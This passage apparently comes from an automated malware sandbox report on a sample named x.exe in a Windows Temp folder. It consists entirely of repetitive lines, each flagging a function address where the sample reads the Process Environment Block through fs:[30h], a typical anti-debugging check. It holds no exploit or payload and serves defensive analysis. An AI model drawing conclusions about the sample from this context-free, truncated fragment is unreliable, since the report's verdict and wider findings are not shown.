          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0198A3C0 mov eax, dword ptr fs:[00000030h]4_2_0198A3C0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0198A3C0 mov eax, dword ptr fs:[00000030h]4_2_0198A3C0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0198A3C0 mov eax, dword ptr fs:[00000030h]4_2_0198A3C0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019883C0 mov eax, dword ptr fs:[00000030h]4_2_019883C0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019883C0 mov eax, dword ptr fs:[00000030h]4_2_019883C0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019883C0 mov eax, dword ptr fs:[00000030h]4_2_019883C0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019883C0 mov eax, dword ptr fs:[00000030h]4_2_019883C0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A553FC mov eax, dword ptr fs:[00000030h]4_2_01A553FC
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A063C0 mov eax, dword ptr fs:[00000030h]4_2_01A063C0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019B63FF mov eax, dword ptr fs:[00000030h]4_2_019B63FF
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0199E3F0 mov eax, dword ptr fs:[00000030h]4_2_0199E3F0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0199E3F0 mov eax, dword ptr fs:[00000030h]4_2_0199E3F0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0199E3F0 mov eax, dword ptr fs:[00000030h]4_2_0199E3F0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A3C3CD mov eax, dword ptr fs:[00000030h]4_2_01A3C3CD
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019903E9 mov eax, dword ptr fs:[00000030h]4_2_019903E9
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019903E9 mov eax, dword ptr fs:[00000030h]4_2_019903E9
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019903E9 mov eax, dword ptr fs:[00000030h]4_2_019903E9
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019903E9 mov eax, dword ptr fs:[00000030h]4_2_019903E9
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019903E9 mov eax, dword ptr fs:[00000030h]4_2_019903E9
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019903E9 mov eax, dword ptr fs:[00000030h]4_2_019903E9
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019903E9 mov eax, dword ptr fs:[00000030h]4_2_019903E9
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019903E9 mov eax, dword ptr fs:[00000030h]4_2_019903E9
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A3B3D0 mov ecx, dword ptr fs:[00000030h]4_2_01A3B3D0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0197C310 mov ecx, dword ptr fs:[00000030h]4_2_0197C310
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A4132D mov eax, dword ptr fs:[00000030h]4_2_01A4132D
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A4132D mov eax, dword ptr fs:[00000030h]4_2_01A4132D
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019A0310 mov ecx, dword ptr fs:[00000030h]4_2_019A0310
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019BA30B mov eax, dword ptr fs:[00000030h]4_2_019BA30B
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019BA30B mov eax, dword ptr fs:[00000030h]4_2_019BA30B
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019BA30B mov eax, dword ptr fs:[00000030h]4_2_019BA30B
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01977330 mov eax, dword ptr fs:[00000030h]4_2_01977330
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A0930B mov eax, dword ptr fs:[00000030h]4_2_01A0930B
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A0930B mov eax, dword ptr fs:[00000030h]4_2_01A0930B
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A0930B mov eax, dword ptr fs:[00000030h]4_2_01A0930B
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019AF32A mov eax, dword ptr fs:[00000030h]4_2_019AF32A
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01979353 mov eax, dword ptr fs:[00000030h]4_2_01979353
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01979353 mov eax, dword ptr fs:[00000030h]4_2_01979353
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A3F367 mov eax, dword ptr fs:[00000030h]4_2_01A3F367
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0197D34C mov eax, dword ptr fs:[00000030h]4_2_0197D34C
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0197D34C mov eax, dword ptr fs:[00000030h]4_2_0197D34C
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A2437C mov eax, dword ptr fs:[00000030h]4_2_01A2437C
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A55341 mov eax, dword ptr fs:[00000030h]4_2_01A55341
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01987370 mov eax, dword ptr fs:[00000030h]4_2_01987370
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01987370 mov eax, dword ptr fs:[00000030h]4_2_01987370
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01987370 mov eax, dword ptr fs:[00000030h]4_2_01987370
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A02349 mov eax, dword ptr fs:[00000030h]4_2_01A02349
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A02349 mov eax, dword ptr fs:[00000030h]4_2_01A02349
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A02349 mov eax, dword ptr fs:[00000030h]4_2_01A02349
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A02349 mov eax, dword ptr fs:[00000030h]4_2_01A02349
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A02349 mov eax, dword ptr fs:[00000030h]4_2_01A02349
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A02349 mov eax, dword ptr fs:[00000030h]4_2_01A02349
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A02349 mov eax, dword ptr fs:[00000030h]4_2_01A02349
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A02349 mov eax, dword ptr fs:[00000030h]4_2_01A02349
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A02349 mov eax, dword ptr fs:[00000030h]4_2_01A02349
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A02349 mov eax, dword ptr fs:[00000030h]4_2_01A02349
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A02349 mov eax, dword ptr fs:[00000030h]4_2_01A02349
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A02349 mov eax, dword ptr fs:[00000030h]4_2_01A02349
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A02349 mov eax, dword ptr fs:[00000030h]4_2_01A02349
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A02349 mov eax, dword ptr fs:[00000030h]4_2_01A02349
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A02349 mov eax, dword ptr fs:[00000030h]4_2_01A02349
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A4A352 mov eax, dword ptr fs:[00000030h]4_2_01A4A352
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A0035C mov eax, dword ptr fs:[00000030h]4_2_01A0035C
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A0035C mov eax, dword ptr fs:[00000030h]4_2_01A0035C
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A0035C mov eax, dword ptr fs:[00000030h]4_2_01A0035C
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A0035C mov ecx, dword ptr fs:[00000030h]4_2_01A0035C
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A0035C mov eax, dword ptr fs:[00000030h]4_2_01A0035C
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A0035C mov eax, dword ptr fs:[00000030h]4_2_01A0035C
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A172A0 mov eax, dword ptr fs:[00000030h]4_2_01A172A0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A172A0 mov eax, dword ptr fs:[00000030h]4_2_01A172A0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A162A0 mov eax, dword ptr fs:[00000030h]4_2_01A162A0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A162A0 mov ecx, dword ptr fs:[00000030h]4_2_01A162A0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A162A0 mov eax, dword ptr fs:[00000030h]4_2_01A162A0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A162A0 mov eax, dword ptr fs:[00000030h]4_2_01A162A0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A162A0 mov eax, dword ptr fs:[00000030h]4_2_01A162A0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A162A0 mov eax, dword ptr fs:[00000030h]4_2_01A162A0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A492A6 mov eax, dword ptr fs:[00000030h]4_2_01A492A6
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A492A6 mov eax, dword ptr fs:[00000030h]4_2_01A492A6
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A492A6 mov eax, dword ptr fs:[00000030h]4_2_01A492A6
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A492A6 mov eax, dword ptr fs:[00000030h]4_2_01A492A6
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019B329E mov eax, dword ptr fs:[00000030h]4_2_019B329E
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019B329E mov eax, dword ptr fs:[00000030h]4_2_019B329E
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A092BC mov eax, dword ptr fs:[00000030h]4_2_01A092BC
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A092BC mov eax, dword ptr fs:[00000030h]4_2_01A092BC
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A092BC mov ecx, dword ptr fs:[00000030h]4_2_01A092BC
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A092BC mov ecx, dword ptr fs:[00000030h]4_2_01A092BC
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019BE284 mov eax, dword ptr fs:[00000030h]4_2_019BE284
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019BE284 mov eax, dword ptr fs:[00000030h]4_2_019BE284
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A00283 mov eax, dword ptr fs:[00000030h]4_2_01A00283
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A00283 mov eax, dword ptr fs:[00000030h]4_2_01A00283
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A00283 mov eax, dword ptr fs:[00000030h]4_2_01A00283
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A55283 mov eax, dword ptr fs:[00000030h]4_2_01A55283
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019902A0 mov eax, dword ptr fs:[00000030h]4_2_019902A0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019902A0 mov eax, dword ptr fs:[00000030h]4_2_019902A0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019952A0 mov eax, dword ptr fs:[00000030h]4_2_019952A0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019952A0 mov eax, dword ptr fs:[00000030h]4_2_019952A0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019952A0 mov eax, dword ptr fs:[00000030h]4_2_019952A0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019952A0 mov eax, dword ptr fs:[00000030h]4_2_019952A0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0197B2D3 mov eax, dword ptr fs:[00000030h]4_2_0197B2D3
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0197B2D3 mov eax, dword ptr fs:[00000030h]4_2_0197B2D3
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0197B2D3 mov eax, dword ptr fs:[00000030h]4_2_0197B2D3
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A552E2 mov eax, dword ptr fs:[00000030h]4_2_01A552E2
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019AF2D0 mov eax, dword ptr fs:[00000030h]4_2_019AF2D0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019AF2D0 mov eax, dword ptr fs:[00000030h]4_2_019AF2D0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A312ED mov eax, dword ptr fs:[00000030h]4_2_01A312ED
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A312ED mov eax, dword ptr fs:[00000030h]4_2_01A312ED
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A312ED mov eax, dword ptr fs:[00000030h]4_2_01A312ED
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A312ED mov eax, dword ptr fs:[00000030h]4_2_01A312ED
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A312ED mov eax, dword ptr fs:[00000030h]4_2_01A312ED
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A312ED mov eax, dword ptr fs:[00000030h]4_2_01A312ED
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A312ED mov eax, dword ptr fs:[00000030h]4_2_01A312ED
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A312ED mov eax, dword ptr fs:[00000030h]4_2_01A312ED
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A312ED mov eax, dword ptr fs:[00000030h]4_2_01A312ED
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A312ED mov eax, dword ptr fs:[00000030h]4_2_01A312ED
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A312ED mov eax, dword ptr fs:[00000030h]4_2_01A312ED
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A312ED mov eax, dword ptr fs:[00000030h]4_2_01A312ED
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A312ED mov eax, dword ptr fs:[00000030h]4_2_01A312ED
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A312ED mov eax, dword ptr fs:[00000030h]4_2_01A312ED
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019AB2C0 mov eax, dword ptr fs:[00000030h]4_2_019AB2C0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019AB2C0 mov eax, dword ptr fs:[00000030h]4_2_019AB2C0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019AB2C0 mov eax, dword ptr fs:[00000030h]4_2_019AB2C0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019AB2C0 mov eax, dword ptr fs:[00000030h]4_2_019AB2C0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019AB2C0 mov eax, dword ptr fs:[00000030h]4_2_019AB2C0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019AB2C0 mov eax, dword ptr fs:[00000030h]4_2_019AB2C0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019AB2C0 mov eax, dword ptr fs:[00000030h]4_2_019AB2C0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A3F2F8 mov eax, dword ptr fs:[00000030h]4_2_01A3F2F8
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0198A2C3 mov eax, dword ptr fs:[00000030h]4_2_0198A2C3
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0198A2C3 mov eax, dword ptr fs:[00000030h]4_2_0198A2C3
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0198A2C3 mov eax, dword ptr fs:[00000030h]4_2_0198A2C3
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0198A2C3 mov eax, dword ptr fs:[00000030h]4_2_0198A2C3
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0198A2C3 mov eax, dword ptr fs:[00000030h]4_2_0198A2C3
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019892C5 mov eax, dword ptr fs:[00000030h]4_2_019892C5
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019892C5 mov eax, dword ptr fs:[00000030h]4_2_019892C5
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019792FF mov eax, dword ptr fs:[00000030h]4_2_019792FF
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019902E1 mov eax, dword ptr fs:[00000030h]4_2_019902E1
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019902E1 mov eax, dword ptr fs:[00000030h]4_2_019902E1
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019902E1 mov eax, dword ptr fs:[00000030h]4_2_019902E1
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A55227 mov eax, dword ptr fs:[00000030h]4_2_01A55227
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019B7208 mov eax, dword ptr fs:[00000030h]4_2_019B7208
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019B7208 mov eax, dword ptr fs:[00000030h]4_2_019B7208
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0197823B mov eax, dword ptr fs:[00000030h]4_2_0197823B
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01986259 mov eax, dword ptr fs:[00000030h]4_2_01986259
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0197A250 mov eax, dword ptr fs:[00000030h]4_2_0197A250
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A4D26B mov eax, dword ptr fs:[00000030h]4_2_01A4D26B
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A4D26B mov eax, dword ptr fs:[00000030h]4_2_01A4D26B
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019B724D mov eax, dword ptr fs:[00000030h]4_2_019B724D
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01979240 mov eax, dword ptr fs:[00000030h]4_2_01979240
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01979240 mov eax, dword ptr fs:[00000030h]4_2_01979240
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A30274 mov eax, dword ptr fs:[00000030h]4_2_01A30274
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A30274 mov eax, dword ptr fs:[00000030h]4_2_01A30274
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A30274 mov eax, dword ptr fs:[00000030h]4_2_01A30274
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A30274 mov eax, dword ptr fs:[00000030h]4_2_01A30274
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A30274 mov eax, dword ptr fs:[00000030h]4_2_01A30274
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A30274 mov eax, dword ptr fs:[00000030h]4_2_01A30274
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A30274 mov eax, dword ptr fs:[00000030h]4_2_01A30274
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A30274 mov eax, dword ptr fs:[00000030h]4_2_01A30274
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A30274 mov eax, dword ptr fs:[00000030h]4_2_01A30274
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A30274 mov eax, dword ptr fs:[00000030h]4_2_01A30274
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A30274 mov eax, dword ptr fs:[00000030h]4_2_01A30274
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A30274 mov eax, dword ptr fs:[00000030h]4_2_01A30274
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019C1270 mov eax, dword ptr fs:[00000030h]4_2_019C1270
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019C1270 mov eax, dword ptr fs:[00000030h]4_2_019C1270
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019A9274 mov eax, dword ptr fs:[00000030h]4_2_019A9274
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A3B256 mov eax, dword ptr fs:[00000030h]4_2_01A3B256
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A3B256 mov eax, dword ptr fs:[00000030h]4_2_01A3B256
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01984260 mov eax, dword ptr fs:[00000030h]4_2_01984260
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01984260 mov eax, dword ptr fs:[00000030h]4_2_01984260
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01984260 mov eax, dword ptr fs:[00000030h]4_2_01984260
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0197826B mov eax, dword ptr fs:[00000030h]4_2_0197826B
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A005A7 mov eax, dword ptr fs:[00000030h]4_2_01A005A7
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A005A7 mov eax, dword ptr fs:[00000030h]4_2_01A005A7
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A005A7 mov eax, dword ptr fs:[00000030h]4_2_01A005A7
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019BE59C mov eax, dword ptr fs:[00000030h]4_2_019BE59C
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019B4588 mov eax, dword ptr fs:[00000030h]4_2_019B4588
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0197758F mov eax, dword ptr fs:[00000030h]4_2_0197758F
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0197758F mov eax, dword ptr fs:[00000030h]4_2_0197758F
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0197758F mov eax, dword ptr fs:[00000030h]4_2_0197758F
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01982582 mov eax, dword ptr fs:[00000030h]4_2_01982582
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01982582 mov ecx, dword ptr fs:[00000030h]4_2_01982582
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A135BA mov eax, dword ptr fs:[00000030h]4_2_01A135BA
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A135BA mov eax, dword ptr fs:[00000030h]4_2_01A135BA
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A135BA mov eax, dword ptr fs:[00000030h]4_2_01A135BA
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A135BA mov eax, dword ptr fs:[00000030h]4_2_01A135BA
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A3F5BE mov eax, dword ptr fs:[00000030h]4_2_01A3F5BE
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019AF5B0 mov eax, dword ptr fs:[00000030h]4_2_019AF5B0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019AF5B0 mov eax, dword ptr fs:[00000030h]4_2_019AF5B0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019AF5B0 mov eax, dword ptr fs:[00000030h]4_2_019AF5B0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019AF5B0 mov eax, dword ptr fs:[00000030h]4_2_019AF5B0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019AF5B0 mov eax, dword ptr fs:[00000030h]4_2_019AF5B0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019AF5B0 mov eax, dword ptr fs:[00000030h]4_2_019AF5B0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019AF5B0 mov eax, dword ptr fs:[00000030h]4_2_019AF5B0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019AF5B0 mov eax, dword ptr fs:[00000030h]4_2_019AF5B0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019AF5B0 mov eax, dword ptr fs:[00000030h]4_2_019AF5B0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019A45B1 mov eax, dword ptr fs:[00000030h]4_2_019A45B1
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019A45B1 mov eax, dword ptr fs:[00000030h]4_2_019A45B1
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019A15A9 mov eax, dword ptr fs:[00000030h]4_2_019A15A9
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019A15A9 mov eax, dword ptr fs:[00000030h]4_2_019A15A9
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019A15A9 mov eax, dword ptr fs:[00000030h]4_2_019A15A9
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019A15A9 mov eax, dword ptr fs:[00000030h]4_2_019A15A9
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019A15A9 mov eax, dword ptr fs:[00000030h]4_2_019A15A9
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A0B594 mov eax, dword ptr fs:[00000030h]4_2_01A0B594
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A0B594 mov eax, dword ptr fs:[00000030h]4_2_01A0B594
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019A95DA mov eax, dword ptr fs:[00000030h]4_2_019A95DA
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019865D0 mov eax, dword ptr fs:[00000030h]4_2_019865D0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019BA5D0 mov eax, dword ptr fs:[00000030h]4_2_019BA5D0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019BA5D0 mov eax, dword ptr fs:[00000030h]4_2_019BA5D0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019FD5D0 mov eax, dword ptr fs:[00000030h]4_2_019FD5D0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019FD5D0 mov ecx, dword ptr fs:[00000030h]4_2_019FD5D0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019BE5CF mov eax, dword ptr fs:[00000030h]4_2_019BE5CF
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019BE5CF mov eax, dword ptr fs:[00000030h]4_2_019BE5CF
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019B55C0 mov eax, dword ptr fs:[00000030h]4_2_019B55C0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A555C9 mov eax, dword ptr fs:[00000030h]4_2_01A555C9
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019A15F4 mov eax, dword ptr fs:[00000030h]4_2_019A15F4
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019A15F4 mov eax, dword ptr fs:[00000030h]4_2_019A15F4
